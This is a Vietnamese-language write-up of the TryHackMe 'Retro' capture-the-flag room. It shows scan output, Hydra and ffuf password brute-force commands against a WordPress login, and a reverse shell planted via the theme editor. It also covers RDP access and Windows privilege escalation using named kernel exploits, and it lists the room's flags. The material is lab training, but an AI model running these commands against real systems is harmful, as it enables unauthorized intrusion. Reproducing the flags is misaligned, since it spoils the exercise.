Retro

Recon

Nmap

nmap 10.10.143.237 -T3 -A -Pn -oN nmap.log
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-21 22:46 +07
Nmap scan report for 10.10.143.237
Host is up (0.34s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-10-21T15:46:39+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2024-10-20T15:40:30
|_Not valid after:  2025-04-21T15:40:30
| rdp-ntlm-info: 
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2024-10-21T15:46:33+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.72 seconds

Nuclei

[waf-detect:modsecurity] [http] [info] http://10.10.143.237
[rdp-detect:win2016] [tcp] [info] 10.10.143.237:3389
[options-method] [http] [info] http://10.10.143.237 ["OPTIONS, TRACE, GET, HEAD, POST"]
[microsoft-iis-version] [http] [info] http://10.10.143.237 ["Microsoft-IIS/10.0"]
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:x-frame-options] [http] [info] http://10.10.143.237
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://10.10.143.237
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:x-content-type-options] [http] [info] http://10.10.143.237
[http-missing-security-headers:referrer-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:clear-site-data] [http] [info] http://10.10.143.237
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.10.143.237
[http-missing-security-headers:content-security-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:permissions-policy] [http] [info] http://10.10.143.237
[tech-detect:ms-iis] [http] [info] http://10.10.143.237
[default-windows-server-page] [http] [info] http://10.10.143.237

Feroxbuster

Tìm thấy một thư mục ẩn bằng feroxbuster:

feroxbuster -u http://10.10.143.237 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -C 404 --burp
 
Scans:
  0: running      http://10.10.143.237/
  2: running      http://10.10.143.237/retro/

Sử dụng nuclei lại lần nữa cho thư mục này:

[waf-detect:modsecurity] [http] [info] http://10.10.143.237/retro
[wordpress-akismet:outdated_version] [http] [info] http://10.10.143.237/retro/wp-content/plugins/akismet/readme.txt ["4.1.2"] [last_version="5.3.3"]
[wordpress-xmlrpc-listmethods] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[wp-xmlrpc-pingback-detection] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[wp-xmlrpc-pingback-detection] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[rdp-detect:win2016] [tcp] [info] 10.10.143.237:3389
[microsoft-iis-version] [http] [info] http://10.10.143.237/retro/ ["Microsoft-IIS/10.0"]
[microsoft-iis-version] [http] [info] http://10.10.143.237/retro ["Microsoft-IIS/10.0"]
[wordpress-xmlrpc-file] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[wp-license-file] [http] [info] http://10.10.143.237/retro/license.txt
[wordpress-readme-file] [http] [info] http://10.10.143.237/retro/readme.html
[metatag-cms] [http] [info] http://10.10.143.237/retro/ ["WordPress 5.2.1"]
[tech-detect:font-awesome] [http] [info] http://10.10.143.237/retro/
[tech-detect:google-font-api] [http] [info] http://10.10.143.237/retro/
[tech-detect:ms-iis] [http] [info] http://10.10.143.237/retro/
[tech-detect:php] [http] [info] http://10.10.143.237/retro/
[tech-detect:ms-iis] [http] [info] http://10.10.143.237/retro
[http-missing-security-headers:clear-site-data] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:referrer-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:permissions-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:x-frame-options] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:x-content-type-options] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:content-security-policy] [http] [info] http://10.10.143.237/retro/
[wordpress-login] [http] [info] http://10.10.143.237/retro/wp-login.php
[options-method] [http] [info] http://10.10.143.237/retro ["OPTIONS, TRACE, GET, HEAD, POST"]
[wordpress-detect:version_by_js] [http] [info] http://10.10.143.237/retro/ ["5.2.1"]
[wp-user-enum:usernames] [http] [low] http://10.10.143.237/retro/?rest_route=/wp/v2/users/ ["wade","Wade"]
[external-service-interaction] [http] [info] http://csb7pqm98q262osnfrs0u5qcpu1pmnqqx.oast.online/retro/
[external-service-interaction] [http] [info] http://csb7pqm98q262osnfrs0u5qcpu1pmnqqx.oast.online/retro/
[external-service-interaction] [http] [info] http://10.10.143.237/retro

Tìm thấy một user có tên là wade, đây có thể là tên tài khoản.

WPScan

[+] URL: http://10.10.170.153/retro/ [10.10.170.153]
[+] Started: Tue Oct 22 20:33:01 2024
 
Interesting Finding(s):
 
[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 
[+] XML-RPC seems to be enabled: http://10.10.170.153/retro/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
 
[+] WordPress readme found: http://10.10.170.153/retro/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 
[+] The external WP-Cron seems to be enabled: http://10.10.170.153/retro/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299
 
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.170.153/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.170.153/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 
[+] WordPress theme in use: 90s-retro
 | Location: http://10.10.170.153/retro/wp-content/themes/90s-retro/
 | Latest Version: 1.4.10 (up to date)
 | Last Updated: 2019-04-15T00:00:00.000Z
 | Readme: http://10.10.170.153/retro/wp-content/themes/90s-retro/readme.txt
 | Style URL: http://10.10.170.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
 | Style Name: 90s Retro
 | Style URI: https://organicthemes.com/retro-theme/
 | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
 | Author: Organic Themes
 | Author URI: https://organicthemes.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4.10 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.170.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'
 
 
[i] No plugins Found.
 
 
[i] User(s) Identified:
 
[+] wade
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.170.153/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
 
[+] Wade
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
 
[+] Finished: Tue Oct 22 20:33:37 2024
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 13.655 KB
[+] Data Received: 238.983 KB
[+] Memory used: 267.023 MB
[+] Elapsed time: 00:00:36

Analysis

Sử dụng Hydra và ffuf để brute-force mật khẩu nhưng không có kết quả gì:

hydra -l wade -P /usr/share/wordlists/rockyou.txt 10.10.170.153 http-post-form "/retro/wp-login.php:log=wade&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fretro%2Fwp-admin%2F&testcookie=1:F=incorrect" -V

ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "log=wade&pwd=FUZZ&wp-submit=Log+In&redirect_to=%2Fretro%2Fwp-admin%2F&testcookie=1" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: wordpress_test_cookie=WP+Cookie+check" -u http://10.10.170.153/retro/wp-login.php -mr "incorrect" -t 10

Một vài hành vi kỳ lạ:

Website sẽ thêm vào ký tự / ở cuối URL và cho vào giá trị của header Location đối với những request có server-side redirect:

GET http://google.com/retro HTTP/1.1
Host: 10.10.170.153
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.170.153/retro/wp-login.php
Accept-Encoding: gzip, deflate, br
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: keep-alive

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://google.com/retro/
Server: Microsoft-IIS/10.0
Date: Tue, 22 Oct 2024 13:00:53 GMT
Content-Length: 147

Tính năng bình luận redirect về localhost:

POST /retro/wp-comments-post.php HTTP/1.1
Host: 10.10.170.153
Content-Length: 165
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.10.170.153
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.170.153/retro/index.php/2019/12/09/ready-player-one/
Accept-Encoding: gzip, deflate, br
Cookie: comment_author_36d06d37d33de1d9dfeeaba170ca88f4=a; comment_author_email_36d06d37d33de1d9dfeeaba170ca88f4=a%40a.com; comment_author_url_36d06d37d33de1d9dfeeaba170ca88f4=http%3A%2F%2Faaaaaa.cpm; wordpress_test_cookie=WP+Cookie+check
Connection: keep-alive
 
comment=comment&author=a&email=a%40a.com&url=http%3A%2F%2Faaaaaa.cpm&wp-comment-cookies-consent=yes&submit=Post+Comment&comment_post_ID=10&comment_parent=8

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Location: http://localhost/retro/index.php/2019/12/09/ready-player-one/?unapproved=11&moderation-hash=96c337e7a14475cf6c9ff1d6e6126ba5#comment-11
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.1.29
Set-Cookie: comment_author_36d06d37d33de1d9dfeeaba170ca88f4=a; expires=Sat, 04-Oct-2025 19:22:39 GMT; Max-Age=30000000; path=/retro/
Set-Cookie: comment_author_email_36d06d37d33de1d9dfeeaba170ca88f4=a%40a.com; expires=Sat, 04-Oct-2025 19:22:39 GMT; Max-Age=30000000; path=/retro/
Set-Cookie: comment_author_url_36d06d37d33de1d9dfeeaba170ca88f4=http%3A%2F%2Faaaaaa.cpm; expires=Sat, 04-Oct-2025 19:22:39 GMT; Max-Age=30000000; path=/retro/
X-Redirect-By: WordPress
Date: Tue, 22 Oct 2024 14:02:39 GMT
Content-Length: 0

Bỏ qua mấy cái nhảm nhí ở trên và tìm thấy một bài blog có tên là “Ready Player One”. Bài blog này có một bình luận của người dùng Wade như sau:

<p>Leaving myself a note here just in case I forget how to spell it: parzival</p>

Chuỗi parzival chính là mật khẩu.

Exploit

Sử dụng tên tài khoản là wade và mật khẩu là parzival để đăng nhập vào WordPress và làm theo các bước trong Internal để tạo một reverse shell sử dụng tính năng “Theme Editor” ở trên trang 404.php.

URL dùng để kích hoạt reverse shell có một chút khác biệt so với Internal bởi vì tên của theme là “twentynineteen” thay vì “twentyseventeen”:

http://<IP>/retro/wp-content/themes/twentynineteen/404.php

Nhớ kích hoạt theme!

Tuy nhiên, không thể truy cập thư mục của người dùng wade thông qua reverse shell.

Thay vào đó, sử dụng thông tin xác thực trên để đăng nhập thông qua RDP (nmap cho thấy port 3389 của giao thức RDP đang được mở).

Truy cập vào và đọc flag ở Desktop.

Escalate

Thăm dò với WinPEAS.ps1:

Fetching the list of services, this may take a while...
Unquoted Service Path found!
Name: AWSLiteAgent
PathName: C:\Program Files\Amazon\XenTools\LiteAgent.exe
StartName: LocalSystem
StartMode: Auto
Running: Running
 
...
 
=========|| STARTUP APPLICATIONS Vulnerable Check
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
RETROWEB\Wade has ownership of C:\Documents and Settings\Wade\Start Menu\Programs\Startup
Identity RETROWEB\Wade has 'FullControl' perms for C:\Documents and Settings\Wade\Start Menu\Programs\Startup
RETROWEB\Wade has ownership of C:\Documents and Settings\Wade\Start Menu\Programs\Startup\desktop.ini
Identity RETROWEB\Wade has 'FullControl' perms for C:\Documents and Settings\Wade\Start Menu\Programs\Startup\desktop.ini
RETROWEB\Wade has ownership of C:\Documents and Settings\Wade\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
Identity RETROWEB\Wade has 'FullControl' perms for C:\Documents and Settings\Wade\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
Identity BUILTIN\Users BUILTIN\Users has 'Write' perms for C:\ProgramData
Identity BUILTIN\Users BUILTIN\Users has 'Write' perms for C:\ProgramData
RETROWEB\Wade has ownership of C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Identity RETROWEB\Wade has 'FullControl' perms for C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
RETROWEB\Wade has ownership of C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
Identity RETROWEB\Wade has 'FullControl' perms for C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
RETROWEB\Wade has ownership of C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
Identity RETROWEB\Wade has 'FullControl' perms for C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
 
...
 
=========|| APPcmd Check
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\System32\inetsrv\appcmd.exe exists!

Thăm dò với PowerUp1.ps1:

[*] Checking for unquoted service paths...
 
 
ServiceName   : AWSLiteAgent
Path          : C:\Program Files\Amazon\XenTools\LiteAgent.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'AWSLiteAgent' -Path <HijackPath>
 
[*] Checking %PATH% for potentially hijackable .dll locations...
 
 
HijackablePath : C:\Users\Wade\AppData\Local\Microsoft\WindowsApps\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\Wade\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll'
                 -Command '...'

Không tìm thấy gì để có thể leo quyền.

Tuy nhiên, ta có thể sử dụng cmdlet sau để biết được HotFixID nhằm xác định bản cập nhật mới nhất ở trên máy mục tiêu:

PS C:\Windows\system32> Get-HotFix  
  
Source        Description      HotFixID      InstalledBy          InstalledOn  
------        -----------      --------      -----------          -----------  
RETROWEB      Update           KB3192137     NT AUTHORITY\SYSTEM  9/12/2016 12:00:00 AM  

Đề bài gợi ý là tìm kiếm xem người dùng cuối cùng ở trên máy mục tiêu đang cố che giấu điều gì. Mở trình duyệt web và thấy một bookmark liên quan đến CVE-2019-1388. Tuy nhiên, khi thử khai thác CVE này thì lại không thành công do không thể mở liên kết bằng trình duyệt.

Xem một số write-up thì thấy họ leo quyền thông qua việc khai thác lỗ hổng trong kernel của Windows hoặc khai thác thông qua [quyền của người dùng đang chạy web server (Juicy Tomato)](https://medium.com/azkrath/tryhackme-walkthrough-retro-273f8b35a20d) (user này có quyền `SeImpersonatePrivilege`, xem thêm [[Windows Privilege Escalation - Abusing Dangerous Privileges]]).

Có thể sử dụng công cụ wesng: Windows Exploit Suggester - Next Generation để gợi ý các khai thác có thể dùng ở trên máy mục tiêu. Công cụ này nhận vào kết quả thực thi của câu lệnh systeminfo:

Host Name:                 RETROWEB
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00377-60000-00000-AA325
Original Install Date:     12/8/2019, 10:50:43 PM
System Boot Time:          10/23/2024, 7:52:59 AM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version:              Xen 4.11.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,048 MB
Available Physical Memory: 937 MB
Virtual Memory: Max Size:  3,200 MB
Virtual Memory: Available: 2,017 MB
Virtual Memory: In Use:    1,183 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB3192137
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.53.114
                                 [02]: fe80::136:8887:a9e1:f49c
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Cũng có thể sử dụng các danh sách sau:

• SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
• WindowsExploits/Exploits: Windows Exploits: chứa các chương trình khai thác đã được biên dịch nên chỉ cần tải về và thực thi. CVE-2017-0213 và CVE-2016-7255 có thể được sử dụng để leo quyền (đã khai thác thành công).

Như vậy, có rất nhiều cách để leo quyền đối với room này và cách mà đề bài gợi ý không phải là một cách khả thi 😩.

Flag(s)

User: 3b99fbdc6d430bfb51c72c651a261927
Root: 7958b569565d7bd88d10c6f22d1c4063

References

• TryHackMe - Retro Walkthrough - Steflan’s Security Blog
• TryHackMe WalkThrough — Retro. During my journey to finish the… | by Fábio Mestre | Azkrath’s Cyber Security Blog | Medium
• TryHackMe-Retro. Retro is a Hard Level CTF on… | by ZeusCybersec | Medium